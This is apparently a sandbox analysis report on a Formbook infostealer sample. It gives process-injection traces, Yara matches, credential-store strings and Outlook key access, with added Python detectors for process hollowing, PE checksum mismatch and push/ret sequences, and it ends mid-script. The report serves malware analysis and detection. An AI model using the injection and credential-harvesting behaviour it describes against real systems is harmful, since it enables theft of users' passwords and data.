            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03743FD5
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03743FD2
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03781F92
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03789EB0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03783D40
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0379FDC0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03831D5A
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03837D73
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037F9C32
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0383FCF2
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02D51A30
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02D4CB80
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02D4C959
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02D4C960
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02D4AC00
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02D5329B
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02D532A0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02D53259
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02D550B0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02D6B5F0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0358E338
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0358E7EC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0358E4535_2_0358E453
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0358CB035_2_0358CB03
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0358CAAB5_2_0358CAAB
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0358D8585_2_0358D858
Source: C:\Windows\SysWOW64\svchost.exe | String function: 03AAEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe | String function: 03A2B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe | String function: 03A87E54 appears 111 times
Source: C:\Windows\SysWOW64\svchost.exe | String function: 03ABF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe | String function: 03A75130 appears 58 times
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | String function: 004115D7 appears 36 times
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | String function: 00416C70 appears 39 times
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | String function: 00445AE0 appears 65 times
Source: C:\Windows\SysWOW64\netbtugc.exe | String function: 037C7E54 appears 102 times
Source: C:\Windows\SysWOW64\netbtugc.exe | String function: 037FF290 appears 105 times
Source: C:\Windows\SysWOW64\netbtugc.exe | String function: 0376B970 appears 280 times
Source: C:\Windows\SysWOW64\netbtugc.exe | String function: 037B5130 appears 58 times
Source: C:\Windows\SysWOW64\netbtugc.exe | String function: 037EEA12 appears 86 times
Source: jpdy1E8K4A.exe, 00000000.00000003.2141380419.0000000004623000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs jpdy1E8K4A.exe
Source: jpdy1E8K4A.exe, 00000000.00000003.2140771082.00000000047CD000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs jpdy1E8K4A.exe
Source: jpdy1E8K4A.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116
Source: 00000002.00000002.2356846252.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116
Source: 00000005.00000002.3983803562.0000000003360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116
Source: 00000005.00000002.3981537741.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116
Source: 00000003.00000002.3984182354.00000000040E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116
Source: 00000005.00000002.3983690192.0000000003310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116
Source: 00000002.00000002.2361090040.0000000007C30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116
Source: 00000002.00000002.2357806281.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116
Source: 00000003.00000002.3991557809.0000000007130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116
Rule metadata for Windows_Trojan_Formbook_1112e116 (identical for every match above): reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/2@14/10
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_0044AF6C GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | File created: C:\Users\user\AppData\Local\Temp\supergroups
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Command line argument: #v | 0_2_0040D6B0
Source: jpdy1E8K4A.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: netbtugc.exe, 00000005.00000002.3982015331.0000000003202000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE server_addresses (id VARCHAR, company_name VARCHAR, street_address VARCHAR, address_1 VARCHAR, address_2 VARCHAR, address_3 VARCHAR, address_4 VARCHAR, postal_code VARCHAR, sorting_code VARCHAR, country_code VARCHAR, language_code VARCHAR, recipient_name VARCHAR, phone_number VARCHAR)x;
Source: netbtugc.exe, 00000005.00000003.2649098471.0000000003180000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3982015331.00000000031A1000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2649228244.00000000031A1000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2651714036.00000000031AC000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3982015331.00000000031D0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: jpdy1E8K4A.exe | ReversingLabs: Detection: 71%
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | File read: C:\Users\user\Desktop\jpdy1E8K4A.exe
Source: unknown | Process created: C:\Users\user\Desktop\jpdy1E8K4A.exe "C:\Users\user\Desktop\jpdy1E8K4A.exe"
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\jpdy1E8K4A.exe"
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe | Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
Source: C:\Windows\SysWOW64\netbtugc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
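The svchost.exe row above is the one worth a second look: the image on disk is C:\Windows\SysWOW64\svchost.exe, yet its command line is the dropper's own path. That is what a process started suspended and then overwritten looks like in process-creation telemetry, and it lines up with the "Maps a DLL or memory area into another process" and "Writes to foreign memory regions" signatures in the overview. The netbtugc.exe row does not show the mismatch, and its parent, URUrIrqwFu.exe, carries the Joe Security FakeChrome .pdb path recorded lower on this page, so that parent is the sandbox's browser decoy rather than a file the sample dropped. The check below is an added example written for this page, not Joe Sandbox code; the event records are constructed from the four rows above, and the field names are an assumption (they mirror the Image, CommandLine and ParentImage fields of a Sysmon event ID 1 record).

```python
import ntpath

# Constructed process-creation events modelled on the four rows above.
# Field names are an assumption (they mirror Sysmon event 1: Image,
# CommandLine, ParentImage); the paths and command lines are the report's.
EVENTS = [
    {"parent": None,
     "image": r"C:\Users\user\Desktop\jpdy1E8K4A.exe",
     "cmdline": r'"C:\Users\user\Desktop\jpdy1E8K4A.exe"'},
    {"parent": r"C:\Users\user\Desktop\jpdy1E8K4A.exe",
     "image": r"C:\Windows\SysWOW64\svchost.exe",
     "cmdline": r'"C:\Users\user\Desktop\jpdy1E8K4A.exe"'},
    {"parent": r"C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe",
     "image": r"C:\Windows\SysWOW64\netbtugc.exe",
     "cmdline": r'"C:\Windows\SysWOW64\netbtugc.exe"'},
    {"parent": r"C:\Windows\SysWOW64\netbtugc.exe",
     "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "cmdline": r'"C:\Program Files\Mozilla Firefox\Firefox.exe"'},
]


def argv0(cmdline: str) -> str:
    """First token of a Windows command line. A leading quote runs to the next
    quote; otherwise the token ends at the first whitespace (CommandLineToArgvW)."""
    s = cmdline.lstrip()
    if not s:
        return ""
    if s[0] == '"':
        end = s.find('"', 1)
        return s[1:] if end == -1 else s[1:end]
    return s.split(None, 1)[0]


def names_match(image: str, arg0: str) -> bool:
    """Compare the on-disk image name with argv[0], case-insensitively, and allow
    an omitted extension ("cmd" for cmd.exe) so ordinary launches do not alert."""
    img = ntpath.basename(image).lower()
    a0 = ntpath.basename(arg0).lower()
    if not a0:
        return True  # empty command line: nothing to compare
    if "." not in a0:
        return a0 == ntpath.splitext(img)[0]
    return a0 == img


def hollowing_candidates(events):
    """Return (image, cmdline, parent) for every process whose image does not
    match its own argv[0]. A process started suspended and overwritten keeps the
    command line the parent handed to CreateProcess, so the mismatch survives."""
    return [(e["image"], e["cmdline"], e["parent"])
            for e in events if not names_match(e["image"], argv0(e["cmdline"]))]


if __name__ == "__main__":
    for image, cmdline, parent in hollowing_candidates(EVENTS):
        print(f"image={image}\n  cmdline={cmdline}\n  parent={parent}")
```

On the rows above only the svchost.exe event is returned; the firefox.exe row differs from its command line only in case and is left alone. Legitimate mismatches exist (8.3 short names such as JPDY1E~1.EXE, and launchers that deliberately pass a different lpCommandLine), so treat the result as a triage signal and weigh it together with the parent: here a system binary under SysWOW64 was started by an executable in a user-writable directory.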
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Sections loaded: apphelp.dll, wsock32.dll, version.dll, winmm.dll, mpr.dll, wininet.dll, userenv.dll, uxtheme.dll, windows.storage.dll, wldp.dll, kernel.appcore.dll
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe | Sections loaded: wininet.dll, mswsock.dll, dnsapi.dll, iphlpapi.dll, rasadhlp.dll, fwpuclnt.dll
Source: C:\Windows\SysWOW64\netbtugc.exe | Sections loaded: iphlpapi.dll, wininet.dll, kernel.appcore.dll, uxtheme.dll, ieframe.dll, iertutil.dll, netapi32.dll, version.dll, userenv.dll, winhttp.dll, wkscli.dll, netutils.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, secur32.dll, mlang.dll, propsys.dll, winsqlite3.dll, vaultcli.dll, wintypes.dll, dpapi.dll, cryptbase.dll
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Windows\SysWOW64\netbtugc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: jpdy1E8K4A.exe | Static file information: File size 1401503 > 1048576
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: URUrIrqwFu.exe, 00000003.00000000.2269264068.000000000049E000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: wntdll.pdbUGP | source: jpdy1E8K4A.exe, 00000000.00000003.2138350351.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, jpdy1E8K4A.exe, 00000000.00000003.2140523388.0000000004500000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2253165221.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2357316364.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2357316364.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2254958069.0000000003800000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3984325140.0000000003740000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2359616832.000000000358E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2357155798.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3984325140.00000000038DE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: jpdy1E8K4A.exe, 00000000.00000003.2138350351.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, jpdy1E8K4A.exe, 00000000.00000003.2140523388.0000000004500000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2253165221.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2357316364.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2357316364.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2254958069.0000000003800000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000005.00000002.3984325140.0000000003740000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2359616832.000000000358E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2357155798.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3984325140.00000000038DE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: netbtugc.pdb | source: svchost.exe, 00000002.00000002.2357173939.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2325952923.000000000341A000.00000004.00000020.00020000.00000000.sdmp, URUrIrqwFu.exe, 00000003.00000003.2301762796.000000000076B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb | source: URUrIrqwFu.exe, 00000003.00000002.3989981117.0000000004CFC000.00000004.80000000.00040000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3982015331.000000000311E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3985399158.0000000003D6C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2758378598.000000001F2CC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP | source: URUrIrqwFu.exe, 00000003.00000002.3989981117.0000000004CFC000.00000004.80000000.00040000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3982015331.000000000311E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3985399158.0000000003D6C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2758378598.000000001F2CC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: netbtugc.pdbGCTL | source: svchost.exe, 00000002.00000002.2357173939.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2325952923.000000000341A000.00000004.00000020.00020000.00000000.sdmp, URUrIrqwFu.exe, 00000003.00000003.2301762796.000000000076B000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress
Source: jpdy1E8K4A.exe | Static PE information: real checksum: 0xa961f should be: 0x15adcb
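The row above compares the CheckSum stored in the optional header (0xa961f) with the value computed over the file (0x15adcb). Windows validates this field only for drivers, DLLs loaded at boot and DLLs loaded into critical system processes, so a user-mode executable runs fine with a wrong value. What makes the row interesting is that the stored value is wrong rather than zero: zero is how most unsigned user-mode binaries ship, while a stale non-zero value means the file was modified after a linker or signing tool filled the field in, which is typical of a packed or hand-patched binary. The script below is an added example, not Joe Sandbox code. It implements the algorithm CheckSumMappedFile uses (a one's-complement sum of the file's 16-bit words with the CheckSum field excluded, plus the file length) and, since the sample itself is not on this page, builds a constructed minimal PE32 to run it on.

```python
import struct


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """Checksum as CheckSumMappedFile computes it: a one's-complement sum of every
    16-bit little-endian word in the file (carries folded back in), with the
    4-byte CheckSum field itself skipped, plus the file length."""
    total = 0
    n = len(data)
    for i in range(0, n - 1, 2):
        if i == checksum_offset or i == checksum_offset + 2:
            continue
        total += struct.unpack_from("<H", data, i)[0]
        total = (total & 0xFFFF) + (total >> 16)
    if n & 1:  # an odd trailing byte is taken as the low byte of a final word
        total += data[-1]
        total = (total & 0xFFFF) + (total >> 16)
    total = (total & 0xFFFF) + (total >> 16)
    return total + n


def checksum_field_offset(data: bytes) -> int:
    """File offset of IMAGE_OPTIONAL_HEADER.CheckSum: e_lfanew + 4 (PE signature)
    + 20 (COFF header) + 64; the field sits at +64 in both PE32 and PE32+."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    return e_lfanew + 4 + 20 + 64


def checksum_status(data: bytes):
    """(stored, computed): the two numbers the report prints as
    'real checksum' and 'should be'."""
    off = checksum_field_offset(data)
    return struct.unpack_from("<I", data, off)[0], pe_checksum(data, off)


def patch_checksum(data: bytes) -> bytes:
    """Copy of the image with a correct CheckSum, as a linker or signtool leaves it."""
    off = checksum_field_offset(data)
    buf = bytearray(data)
    struct.pack_into("<I", buf, off, pe_checksum(data, off))
    return bytes(buf)


def build_minimal_pe() -> bytes:
    """Constructed 1 KiB PE32 (i386, one .text section holding a single ret);
    CheckSum is left at 0, which is how most unsigned user-mode binaries ship."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                       # e_lfanew
    # i386, 1 section, 224-byte PE32 optional header, EXECUTABLE_IMAGE|32BIT_MACHINE
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                       # PE32 magic
    struct.pack_into("<I", opt, 16, 0x1000)                     # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)                   # ImageBase
    struct.pack_into("<II", opt, 32, 0x1000, 0x200)             # SectionAlignment, FileAlignment
    struct.pack_into("<II", opt, 56, 0x2000, 0x200)             # SizeOfImage, SizeOfHeaders
    struct.pack_into("<H", opt, 68, 2)                          # Subsystem: WINDOWS_GUI
    struct.pack_into("<I", opt, 92, 16)                         # NumberOfRvaAndSizes
    sect = struct.pack("<8sIIIIIIHHI", b".text", 0x200, 0x1000, 0x200, 0x200,
                       0, 0, 0, 0, 0x60000020)                  # CNT_CODE|MEM_EXECUTE|MEM_READ
    headers = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sect
    headers += b"\0" * (0x200 - len(headers))
    return headers + b"\xC3" + b"\xCC" * 0x1FF                  # ret, then int3 padding


if __name__ == "__main__":
    stored, computed = checksum_status(build_minimal_pe())
    print(f"real checksum: {stored:#x} should be: {computed:#x}")
```

Because the field itself is excluded from the sum, the computed value is the same whether the header currently holds 0, the right value or a stale one, which is what lets the report state a single "should be" figure; any other byte change, including a one-byte patch in the section data, moves it.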
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00403060 push eax; ret 2_2_00403062
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004160FC push 00000030h; retf 2_2_00416149
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041789B push C5503231h; retf 2_2_004178A3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041613C push 00000030h; retf 2_2_00416149
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040D211 pushad ; ret 2_2_0040D212
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004132A3 push esi; ret 2_2_004132A8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041136F push edi; retf 2_2_00411372
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00417CFB push 789F05E2h; iretd 2_2_00417D02
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004135D8 push ds; retf 2_2_004135F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004135E3 push ds; retf 2_2_004135F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00414594 push edi; retf 2_2_004145B7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041E67B push ebp; retf 2_2_0041E67D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041E61E push eax; retf 2_2_0041E647
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041E6DA pushad ; ret 2_2_0041E6DB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004016F6 push ss; ret 2_2_00401859
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00417FCB push edx; iretd 2_2_00417FCD
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401FF6 push ecx; ret 2_2_00401FFF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A0225F pushad ; ret 2_2_03A027F9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A027FA pushad ; ret 2_2_03A027F9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A309AD push ecx; mov dword ptr [esp], ecx 2_2_03A309B6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A0283D push eax; iretd 2_2_03A02858
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A01366 push eax; iretd 2_2_03A01369
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe | Code function: 3_2_043E8404 push esi; ret 3_2_043E8409
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe | Code function: 3_2_043E64D0 push edi; retf 3_2_043E64D3
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe | Code function: 3_2_043E96F5 push edi; retf 3_2_043E9718
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe | Code function: 3_2_043E8739 push ds; retf 3_2_043E8751
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe | Code function: 3_2_043E8744 push ds; retf 3_2_043E8751
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe | Code function: 3_2_043EC9FC push C5503231h; retf 3_2_043ECA04
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe | Code function: 3_2_043EB25D push 00000030h; retf 3_2_043EB2AA
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe | Code function: 3_2_043EB29D push 00000030h; retf 3_2_043EB2AA
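The push/return rows above come from the sandbox's static pass, which reports a push followed (not necessarily directly) by a return. Two different things are mixed in that list. A `push <address>; ret` whose address lies inside the image is a deliberate jump without a jmp, a cheap way to hide control flow from static analysis. A `push C5503231h; retf` or `push 789F05E2h; iretd`, on the other hand, is what a linear sweep prints when it walks bytes that are data or not-yet-decrypted code: a far return pops a code-segment selector and an interrupt return pops EFLAGS as well, so an arbitrary 32-bit immediate in front of either is not a plausible instruction pair. Note that the same `push C5503231h; retf` and `push 00000030h; retf` sequences are reported in the svchost.exe region at 0x400000 and in URUrIrqwFu.exe, consistent with one payload present in both, which is also where the Formbook Yara rule matched. The scanner below is an added example, not Joe Sandbox code: it pairs only adjacent push/return bytes, runs on a constructed buffer, and assumes an image range of 0x400000 to 0x420000 for the classification.

```python
import struct
from typing import List, NamedTuple


class Gadget(NamedTuple):
    va: int       # address of the push
    push: str     # "push C5503231h", formatted the way the report prints it
    target: int   # immediate that becomes the return address
    ret: str      # "ret", "retf" or "iretd"
    ret_va: int   # address of the return instruction


_RETURNS = {0xC3: "ret", 0xCB: "retf", 0xCF: "iretd"}


def find_push_ret(code: bytes, base: int = 0) -> List[Gadget]:
    """Byte-level linear sweep for `push imm` immediately followed by a return:
    68 imm32 or 6A imm8 (sign-extended), then C3 / CB / CF. There is no decoder,
    so it reports exactly what a linear-sweep disassembler would, data included."""
    hits = []
    for i, op in enumerate(code):
        if op == 0x68 and i + 5 < len(code):
            imm, width = struct.unpack_from("<I", code, i + 1)[0], 5
        elif op == 0x6A and i + 2 < len(code):
            imm, width = struct.unpack_from("<b", code, i + 1)[0] & 0xFFFFFFFF, 2
        else:
            continue
        ret = _RETURNS.get(code[i + width])
        if ret:
            hits.append(Gadget(base + i, f"push {imm:08X}h", imm, ret, base + i + width))
    return hits


def classify(g: Gadget, image_lo: int, image_hi: int) -> str:
    """A near ret into the image's own range is a deliberate jump-by-ret. retf pops
    a code-segment selector and iretd pops EFLAGS too, so an arbitrary immediate in
    front of either is far more likely data walked as code than a real pair."""
    if g.ret == "ret":
        return ("push/ret jump inside image" if image_lo <= g.target < image_hi
                else "push/ret with target outside image")
    return "probably not code (far/interrupt return after immediate push)"


# Constructed buffer: one real push/ret jump, then two sequences of the kind the
# report lists for svchost.exe and URUrIrqwFu.exe (push C5503231h; retf and
# push 00000030h; retf). 0x400000 is the region the report's Yara matches name.
SAMPLE = bytes.fromhex(
    "68 00 10 40 00 C3"   # push 00401000h ; ret
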